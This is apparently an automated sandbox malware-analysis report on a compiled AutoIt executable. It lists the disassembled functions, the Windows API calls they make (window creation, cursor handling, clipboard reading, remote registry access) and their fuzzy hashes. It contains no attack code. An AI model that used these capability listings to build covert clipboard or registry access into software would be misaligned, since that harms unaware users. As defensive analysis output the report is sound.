                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: Color$Rect$Object$BrushInflateSelect$CreateText$DeleteFillFrameLongMessageRoundSendSolidWindow
                                                                          • String ID:
                                                                          • API String ID: 69173610-0
                                                                          • Opcode ID: fbb8d870229eb44a1def9ba3881ac6b42e654f1da7cb1ff5097cb3e0d6ff825e
                                                                          • Instruction ID: 7a723b7ebc9985c742df47702d768576d0729d4f0beaa2415310c4eb73739e4f
                                                                          • Opcode Fuzzy Hash: fbb8d870229eb44a1def9ba3881ac6b42e654f1da7cb1ff5097cb3e0d6ff825e
                                                                          • Instruction Fuzzy Hash: 76B15BB1508301AFD304DF64DD88A6FB7F8FB88720F104A2DF996922A0D774E945CB66
                                                                          Function 004590BD Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 291windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • DestroyWindow.USER32(?), ref: 004590F2
                                                                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 004591AF
                                                                          • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 004591EF
                                                                          • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00459200
                                                                          • CreateWindowExW.USER32(00000008,AutoIt v3,00000000,?,88C00000,?,?,?,00000001,?,00000000,00000000), ref: 00459242
                                                                          • GetClientRect.USER32(00000000,?), ref: 0045924E
                                                                          • CreateWindowExW.USER32(00000000,static,00000000,?,50000000,?,00000004,00000500,00000018,?,00000000,00000000), ref: 00459290
                                                                          • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004592A2
                                                                          • GetStockObject.GDI32(00000011), ref: 004592AC
                                                                          • SelectObject.GDI32(00000000,00000000), ref: 004592B4
                                                                          • GetTextFaceW.GDI32(00000000,00000040,?), ref: 004592C4
                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004592CD
                                                                          • DeleteDC.GDI32(00000000), ref: 004592D6
                                                                          • CreateFontW.GDI32(?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 0045931C
                                                                          • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00459334
                                                                          • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,?,00000000,00000000,00000000), ref: 0045936E
                                                                          • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00459382
                                                                          • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00459393
                                                                          • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,?,00000000,00000000,00000000), ref: 004593C8
                                                                          • GetStockObject.GDI32(00000011), ref: 004593D3
                                                                          • SendMessageW.USER32(?,00000030,00000000), ref: 004593E3
                                                                          • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004593EE
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                          • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                          • API String ID: 2910397461-517079104
                                                                          • Opcode ID: 7a94e82ab5e7eba8c21ff2ad013f2909889a905bd0bc04285d9267b4528ddb10
                                                                          • Instruction ID: c5562805fc82c6770b180505aab83e69ed0b4cba248239bed49a3b83ebf26fc7
                                                                          • Opcode Fuzzy Hash: 7a94e82ab5e7eba8c21ff2ad013f2909889a905bd0bc04285d9267b4528ddb10
                                                                          • Instruction Fuzzy Hash: 71A18371B40214BFEB14DF64CD8AFAE7769AB44711F208529FB05BB2D1D6B4AD00CB68
                                                                          Function 00403A20 Relevance: 45.7, APIs: 14, Strings: 12, Instructions: 238COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: __wcsnicmp
                                                                          • String ID: #NoAutoIt3Execute$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#requireadmin$Cannot parse #include$Unterminated group of comments
                                                                          • API String ID: 1038674560-3360698832
                                                                          • Opcode ID: 23f0f58ea95d18462155f90075fe93dcb11182f556a84baaa607307f542fa917
                                                                          • Instruction ID: 9c7d50a5cd0ee83047e92bfb3361563e61671b380f2e7b4b5fccf758bfaba57c
                                                                          • Opcode Fuzzy Hash: 23f0f58ea95d18462155f90075fe93dcb11182f556a84baaa607307f542fa917
                                                                          • Instruction Fuzzy Hash: B5610670701621B7D711AE219C42FAF335C9F50705F50442BFE05AA286FB7DEE8686AE
                                                                          Function 00430737 Relevance: 43.6, APIs: 29, Instructions: 108COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • LoadCursorW.USER32(00000000,00007F89), ref: 00430754
                                                                          • SetCursor.USER32(00000000), ref: 0043075B
                                                                          • LoadCursorW.USER32(00000000,00007F8A), ref: 0043076C
                                                                          • SetCursor.USER32(00000000), ref: 00430773
                                                                          • LoadCursorW.USER32(00000000,00007F03), ref: 00430784
                                                                          • SetCursor.USER32(00000000), ref: 0043078B
                                                                          • LoadCursorW.USER32(00000000,00007F8B), ref: 0043079C
                                                                          • SetCursor.USER32(00000000), ref: 004307A3
                                                                          • LoadCursorW.USER32(00000000,00007F01), ref: 004307B4
                                                                          • SetCursor.USER32(00000000), ref: 004307BB
                                                                          • LoadCursorW.USER32(00000000,00007F88), ref: 004307CC
                                                                          • SetCursor.USER32(00000000), ref: 004307D3
                                                                          • LoadCursorW.USER32(00000000,00007F86), ref: 004307E4
                                                                          • SetCursor.USER32(00000000), ref: 004307EB
                                                                          • LoadCursorW.USER32(00000000,00007F83), ref: 004307FC
                                                                          • SetCursor.USER32(00000000), ref: 00430803
                                                                          • LoadCursorW.USER32(00000000,00007F85), ref: 00430814
                                                                          • SetCursor.USER32(00000000), ref: 0043081B
                                                                          • LoadCursorW.USER32(00000000,00007F82), ref: 0043082C
                                                                          • SetCursor.USER32(00000000), ref: 00430833
                                                                          • LoadCursorW.USER32(00000000,00007F84), ref: 00430844
                                                                          • SetCursor.USER32(00000000), ref: 0043084B
                                                                          • LoadCursorW.USER32(00000000,00007F04), ref: 0043085C
                                                                          • SetCursor.USER32(00000000), ref: 00430863
                                                                          • LoadCursorW.USER32(00000000,00007F02), ref: 00430874
                                                                          • SetCursor.USER32(00000000), ref: 0043087B
                                                                          • SetCursor.USER32(00000000), ref: 00430887
                                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 00430898
                                                                          • SetCursor.USER32(00000000), ref: 0043089F
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: Cursor$Load
                                                                          • String ID:
                                                                          • API String ID: 1675784387-0
                                                                          • Opcode ID: c7473186da6a924b3206e1e01d9541ab2871430d40d1833d6e341d2f3415b8bd
                                                                          • Instruction ID: ada3a8d1d263842f4cf6b5ed80e179871947c4c62c163598e9ab22da256eac1d
                                                                          • Opcode Fuzzy Hash: c7473186da6a924b3206e1e01d9541ab2871430d40d1833d6e341d2f3415b8bd
                                                                          • Instruction Fuzzy Hash: AF3101729C8205B7EA546BE0BE1DF5D3618AB28727F004836F309B54D09AF551509B6D
                                                                          Function 004308EF Relevance: 42.2, APIs: 28, Instructions: 200windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetSysColor.USER32(0000000E), ref: 00430913
                                                                          • SetTextColor.GDI32(?,00000000), ref: 0043091B
                                                                          • GetSysColor.USER32(00000012), ref: 00430933
                                                                          • SetTextColor.GDI32(?,?), ref: 0043093B
                                                                          • GetSysColorBrush.USER32(0000000F), ref: 0043094E
                                                                          • GetSysColor.USER32(0000000F), ref: 00430959
                                                                          • CreateSolidBrush.GDI32(?), ref: 00430962
                                                                          • GetSysColor.USER32(00000011), ref: 00430979
                                                                          • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
                                                                          • SelectObject.GDI32(?,00000000), ref: 0043099C
                                                                          • SetBkColor.GDI32(?,?), ref: 004309A6
                                                                          • SelectObject.GDI32(?,?), ref: 004309B4
                                                                          • InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
                                                                          • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00430A09
                                                                          • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
                                                                          • GetWindowTextW.USER32(00000000,00000000,?), ref: 00430A5A
                                                                          • InflateRect.USER32(?,000000FD,000000FD), ref: 00430A86
                                                                          • DrawFocusRect.USER32(?,?), ref: 00430A91
                                                                          • GetSysColor.USER32(00000011), ref: 00430A9F
                                                                          • SetTextColor.GDI32(?,00000000), ref: 00430AA7
                                                                          • DrawTextW.USER32(?,?,000000FF,?,00000105), ref: 00430ABC
                                                                          • SelectObject.GDI32(?,?), ref: 00430AD0
                                                                          • DeleteObject.GDI32(00000105), ref: 00430ADC
                                                                          • SelectObject.GDI32(?,?), ref: 00430AE3
                                                                          • DeleteObject.GDI32(?), ref: 00430AE9
                                                                          • SetTextColor.GDI32(?,?), ref: 00430AF0
                                                                          • SetBkColor.GDI32(?,?), ref: 00430AFB
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: Color$ObjectText$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                          • String ID:
                                                                          • API String ID: 1582027408-0
                                                                          • Opcode ID: 550e896c7567608c30fce12d6ed7134b72d55419159f0474b5285c649df46e98
                                                                          • Instruction ID: b12033eb3fa9204049de4d7caedd8dcf025edfa44633034d6aae7949f8ecba99
                                                                          • Opcode Fuzzy Hash: 550e896c7567608c30fce12d6ed7134b72d55419159f0474b5285c649df46e98
                                                                          • Instruction Fuzzy Hash: 6F713071900209BFDB04DFA8DD88EAEBBB9FF48710F104619F915A7290D774A941CFA8
                                                                          Function 0046B9D7 Relevance: 40.7, APIs: 17, Strings: 6, Instructions: 415registryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046BAE6
                                                                          • RegCreateKeyExW.ADVAPI32(?,?,00000000,00484EA8,00000000,?,00000000,?,?,?), ref: 0046BB40
                                                                          • RegCloseKey.ADVAPI32(?,00000001,00000000,00000000,00000000), ref: 0046BB8A
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: CloseConnectCreateRegistry
                                                                          • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                          • API String ID: 3217815495-966354055
                                                                          • Opcode ID: c70c32215588f8ec8bb03fc6aa478a266b625616447da64362da41b73b816162
                                                                          • Instruction ID: 14c723365299aea1e32a80c9e2d98689f85295d348ed372ee81e16963ac3f886
                                                                          • Opcode Fuzzy Hash: c70c32215588f8ec8bb03fc6aa478a266b625616447da64362da41b73b816162
                                                                          • Instruction Fuzzy Hash: BCE18171604200ABD710EF65C885F1BB7E8EF88704F14895EB949DB352D739ED41CBA9
                                                                          Function 004565B2 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 291windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetCursorPos.USER32(?), ref: 004566AE
                                                                          • GetDesktopWindow.USER32 ref: 004566C3
                                                                          • GetWindowRect.USER32(00000000), ref: 004566CA
                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00456722
                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00456735
                                                                          • DestroyWindow.USER32(?), ref: 00456746
                                                                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00456794
                                                                          • SendMessageW.USER32(00000000,00000432,00000000,0000002C), ref: 004567B2
                                                                          • SendMessageW.USER32(?,00000418,00000000,?), ref: 004567C6
                                                                          • SendMessageW.USER32(?,00000439,00000000,0000002C), ref: 004567D6
                                                                          • SendMessageW.USER32(?,00000421,?,?), ref: 004567F6
                                                                          • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 0045680C
                                                                          • IsWindowVisible.USER32(?), ref: 0045682C
                                                                          • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00456848
                                                                          • SendMessageW.USER32(?,00000411,00000001,0000002C), ref: 0045685C
                                                                          • GetWindowRect.USER32(?,?), ref: 00456873
                                                                          • MonitorFromPoint.USER32(?,00000001,00000002), ref: 00456891
                                                                          • GetMonitorInfoW.USER32(00000000,?), ref: 004568A9
                                                                          • CopyRect.USER32(?,?), ref: 004568BE
                                                                          • SendMessageW.USER32(?,00000412,00000000), ref: 00456914
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSendWindow$Rect$LongMonitor$CopyCreateCursorDesktopDestroyFromInfoPointVisible
                                                                          • String ID: ($,$tooltips_class32
                                                                          • API String ID: 225202481-3320066284
                                                                          • Opcode ID: d36279d6046af7916fa8cb53b873a9c87cdaa8c87180e7b1c59dea88ca998a74
                                                                          • Instruction ID: fcdb4dd5bfb9c4cfeeadc9569793f3eee26ed74f2078e1bfb0220ba6a1b85fea
                                                                          • Opcode Fuzzy Hash: d36279d6046af7916fa8cb53b873a9c87cdaa8c87180e7b1c59dea88ca998a74
                                                                          • Instruction Fuzzy Hash: 4CB17170A00205AFDB54DFA4CD85BAEB7B4BF48304F10895DE919BB282D778A949CB58
                                                                          Function 0046DCB4 Relevance: 36.2, APIs: 24, Instructions: 247clipboardCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • OpenClipboard.USER32(?), ref: 0046DCE7
                                                                          • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
                                                                          • GetClipboardData.USER32(0000000D), ref: 0046DD01
                                                                          • CloseClipboard.USER32 ref: 0046DD0D
                                                                          • GlobalLock.KERNEL32(00000000), ref: 0046DD37
                                                                          • CloseClipboard.USER32 ref: 0046DD41
                                                                          • IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
                                                                          • GetClipboardData.USER32(00000001), ref: 0046DD8D
                                                                          • CloseClipboard.USER32 ref: 0046DD99
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: Clipboard$Close$AvailableDataFormat$GlobalLockOpen
                                                                          • String ID:
                                                                          • API String ID: 15083398-0
                                                                          • Opcode ID: 5d52f7a8e2fbd0ab087c8c139685d9916ac200a5779b15fccd04bfb456a25eb2
                                                                          • Instruction ID: c6f05cb0c77453757aa6b00544986da50a17ac1627668c5aecb5782462309948
                                                                          • Opcode Fuzzy Hash: 5d52f7a8e2fbd0ab087c8c139685d9916ac200a5779b15fccd04bfb456a25eb2
                                                                          • Instruction Fuzzy Hash: CE81B072704201ABD310EF65DD8AB5EB7A8FF94315F00482EF605E72D1EB74E905879A
                                                                          Function 00471BC9 Relevance: 35.3, APIs: 18, Strings: 2, Instructions: 313windowtimeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                          • GetWindowRect.USER32(?,?), ref: 00471CF7
                                                                          • GetClientRect.USER32(?,?), ref: 00471D05
                                                                          • GetSystemMetrics.USER32(00000007), ref: 00471D0D
                                                                          • GetSystemMetrics.USER32(00000008), ref: 00471D20
                                                                          • GetSystemMetrics.USER32(00000004), ref: 00471D42
                                                                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00471D71
                                                                          • GetSystemMetrics.USER32(00000007), ref: 00471D79
                                                                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00471DA3
                                                                          • GetSystemMetrics.USER32(00000008), ref: 00471DAB
                                                                          • GetSystemMetrics.USER32(00000004), ref: 00471DCF
                                                                          • SetRect.USER32(?,00000000,00000000,?,?), ref: 00471DEE
                                                                          • AdjustWindowRectEx.USER32(?,?,00000000,00000040), ref: 00471DFF
                                                                          • CreateWindowExW.USER32(00000040,AutoIt v3 GUI,?,?,?,?,?,?,?,00000000,00400000,00000000), ref: 00471E35
                                                                          • SetWindowLongW.USER32(00000000,000000EB,?), ref: 00471E6E
                                                                          • GetClientRect.USER32(?,?), ref: 00471E8A
                                                                          • GetStockObject.GDI32(00000011), ref: 00471EA6
                                                                          • SendMessageW.USER32(?,00000030,00000000), ref: 00471EB2
                                                                          • SetTimer.USER32(00000000,00000000,00000028,00462986), ref: 00471ED9
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: System$Metrics$Rect$Window$ClientInfoParameters$AdjustCreateLongMessageObjectSendStockTimer_malloc
                                                                          • String ID: @$AutoIt v3 GUI
                                                                          • API String ID: 867697134-3359773793
                                                                          • Opcode ID: d466945cffb50a7196a7867ec3c7573785653ff52612d7c288cf7d01b72dc8e8
                                                                          • Instruction ID: 8cf5fd9e7b0abf2f472dad9b41bae804ea9cb1b32c1b51d65689880f1cfe2d6c
                                                                          • Opcode Fuzzy Hash: d466945cffb50a7196a7867ec3c7573785653ff52612d7c288cf7d01b72dc8e8
                                                                          • Instruction Fuzzy Hash: 7DC17F71A402059FDB14DFA8DD85BAF77B4FB58714F10862EFA09A7290DB78A840CB58
                                                                          Function 00469296 Relevance: 33.4, APIs: 6, Strings: 13, Instructions: 116COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: __wcsicoll$__wcsnicmp
                                                                          • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:$pQH
                                                                          • API String ID: 790654849-32604322
                                                                          • Opcode ID: 29d435e902b015a153743909057decd258383f7606cc46ad0233eead686698a2
                                                                          • Instruction ID: c91e69f26a1c2718e03151092e39642ccf44f92bf630fd0466772f198d10bc2a
                                                                          • Opcode Fuzzy Hash: 29d435e902b015a153743909057decd258383f7606cc46ad0233eead686698a2
                                                                          • Instruction Fuzzy Hash: CA317731A0420966DB10FAA2DD46BAE736C9F15315F20053BBD00BB2D5E7BC6E4587AE
                                                                          Function 00455A89 Relevance: 31.9, APIs: 21, Instructions: 395COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
